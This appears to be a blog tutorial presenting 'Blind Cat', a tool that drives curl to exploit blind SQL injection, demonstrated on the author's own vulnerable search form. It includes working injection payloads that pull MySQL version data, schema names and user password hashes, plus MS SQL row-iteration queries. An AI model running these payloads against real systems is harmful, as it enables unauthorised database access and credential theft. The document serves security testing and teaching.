If you want kind of a "shortcut" you may see the video how the tool works (below). Otherwise, read the whole story step by step (recommended). Important: Blind Cat is not fully automated tool (not a kind of "one-click-ownage"), but if you will catch the idea of it - in return you would get a huge flexibility to exploit even most difficult blind SQL injections. But remember: you are the one who is exploiting, not the tool! :)

Why another tool for exploiting blind SQL injection?

The main reason is that blind SQL injections, by their nature, often are very different. They have different smells, colors and flavors so I must say it's hell-difficult to find a right tools which would suite all cases. If you have the one - please be a good boy/girl and drop me a line. And a link. ;) But for now, let's make a list of features for such magic program. So it should be able to:

• Be independent from SQL engine (support MS SQL, MySQL, Oracle, DB2, Firebird, etc.).
• Be independent from SQL language differences between different systems.
• Support "true/false", "true/error" and time-based conditions (maybe more).
• Be able to send HTTP request (GET or POST) to vulnerable web applications, with many different parameters.
• Support HTTP and HTTPS.
• It may be required to provide tons of custom cookies, viewstates, etc.
• It may also be required to send custom HTTP header (referrers, browser info, etc.).
• It would be nice to be able use a HTTP proxy if needed (kind of "debug mode" for our exploitation).
• It should be possible to execute any SQL query (assuming the remote system and the vulnerability allow it).
• The tool should be reasonably easy to use (hmm... that's could be a tough one).

So you still think you already have a right tool, aren't you?... ;)

Swiss army knife for building HTTP requests

Ok, so let's think what is most generic of all above? To exploit blind SQL injection you must be able to send custom HTTP request, get the response, modify the request, get the response again and compare (and again and again...). So what if we will be using some third-party tool (easy to use and well-documented) for constructing and sending such requests and then only write a kind of "automation tool" for it (we don't want to reinvent a wheel, right?).

After some consideration the tool for sending requests was chosen. And it was CURL. I am 100% sure: every "IT guy" is familiar with it (honestly: I never met the one who never used it). So if you have some personal doubts regarding the tool - my advise: RTFM. ;)

The "Blind Cat"

This is, once again,  kind a proof of concept rather the final product. So what is the basic idea of operating Blind Cat?

The tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

Assuming you are dealing with blind SQL injection in a web application, this is what you should do to exploit it:

• You have to build custom HTTP request (saved it in curl.config) with all "bells and whistles" needed (custom header, cookies, etc.).
• You have to write your own SQL query to exploit SQL injection (also written in curl.config). You also should put some tags in places of all iterations (characters, rows, etc.).
• You have to define the condition for "true" or "false", response boundaries (expected length of response) and also expected number of rows you may get in return.
• Click the button "RUN" and enjoy :).

Let's try to exploit something with Blind Cat and see how it works:

Sample exploitation

This is simple vulnerable application I made. The input from the search form is not sanitized, so we have typical blind SQL injection. SQL engine = MySQL.

Checking for blind SQL injection (actually you may see it in the movie):

en' and 1=1# --> you see the table with search results

en' and 1=2# --> you don't see the table with search results

Now let's preview the web page's HTML source and find something which will be used to differentiate condition "true" from "false". Here it is:

So this fragment of the code: <td>1</td> is rendered in case of en' and 1=1# condition. Nice. If we will intercept the request from our web browser e.g. in Burp Suite - this is what we may see:

Of course, such request may be much more complicated, but the important thing here is: we may copy it and repeat "as it is". Now let's change our request parameters in curl.config so we may be able to "mimic" the HTTP request from above and also execute the following SQL query:

SELECT @@VERSION

Look at this file. This HTTP header is exactly what CURL will be sending to our web application:

The last string should be replaced with something like this:

#-------------------------------------- GET/POST parameters
-d "keyword=en'%20and%201=(SELECT%20ORD(SUBSTR(@@VERSION,<char_position>,1))><char_value>)#"

I assume you know how blind SQL injection may be exploited to get some data char-by-char, so I am not going deep into explanations about this query.

After you will check if all paths are correct in BlindCat.ini (self explanatory) - it's time to run the Blind Cat! The user interface is quite easy:

Keep attention to the Keyword for "true". This is very important variable! Now press RUN button and see the delightful view how the data is extracted. :) (ach, you've been already seeing the movie, isn't it)

The tool is running multiple threads at the same time, so exploitation is pretty fast. You may change nr of threads, but don't expect 20 or 30 be better then 5. Sample experiment quickly shown that 5-6 threads is good enough. In fact, if more then 5 threads are in use - the overall exploitation time is not dropping down significantly, but at the same time your processor's usage will be increased.

Ok, this is it. If you want to try more samples from the movie, here they are:

Get all databases (still in MySQL). SQL query:

SELECT schema_name FROM information_schema.schemata

...and the config:

#-------------------------------------- GET/POST parameters
-d "keyword=en'%20and%201=(SELECT%20(ORD(SUBSTR((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%20<main_iterator>,%201),<char_position>,<char_value>))><char_value>))#"

Get users' combined info. SQL query:

SELECT CONCAT(HOST,'|',USER,'|',PASSWORD) FROM mysql.user LIMIT 0, 1

...and the config:

#-------------------------------------- GET/POST parameters
-d "keyword=en'%20and%201=(SELECT%20(ORD(SUBSTR((SELECT%20CONCAT(HOST,'|',USER,'|',PASSWORD)%20FROM%20mysql.user%20LIMIT%20<main_iterator>,%201),%20<char_position>,%201))%20>%20<char_value>))#"

FYI: if you want to make a multiline response when exploiting MS SQL server - we should use slightly different SQL query pattern because we don't have LIMIT keyword in MS SQL. :-( So this is what we should do:

SELECT top 1 name FROM master..syslogins where name not in (SELECT top 0 name FROM master..syslogins)

then for the next row:

SELECT top 1 name FROM master..syslogins where name not in (SELECT top 1 name FROM master..syslogins)

...and so on. You've got the idea where the <main_iterator> tag goes, right?

I have almost forgotten: the tool may be downloaded from [here], and the source code in Delphi may be found [here]. Enjoy! :-)